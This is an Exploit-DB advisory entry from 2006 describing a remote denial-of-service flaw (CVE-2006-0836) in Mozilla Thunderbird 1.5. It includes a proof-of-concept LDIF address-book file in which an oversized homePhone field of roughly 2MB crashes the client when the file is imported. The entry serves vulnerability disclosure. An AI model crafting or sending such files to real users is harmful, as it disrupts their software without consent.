Mozilla Thunderbird 1.5 Address Book Import Remote Denial of Service Vulnerability

2006-02-17T00:00:00
ID EDB-ID:27246
Type exploitdb
Reporter DrFrancky
Modified 2006-02-17T00:00:00

Description

Mozilla Thunderbird 1.5 Address Book Import Remote Denial of Service Vulnerability. CVE-2006-0836. Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/16716/info

Mozilla Thunderbird is prone to a remote denial-of-service vulnerability. 

The issue presents itself when the application handles a specially crafted address book file.

Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.

POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by DrFrancky@securax.org,mail=drfrancky@securax.org
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by DrFrancky@securax.org
cn: POC by DrFrancky@securax.org
mozillaNickname: DrFrancky
mail: drfrancky@securax.org
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']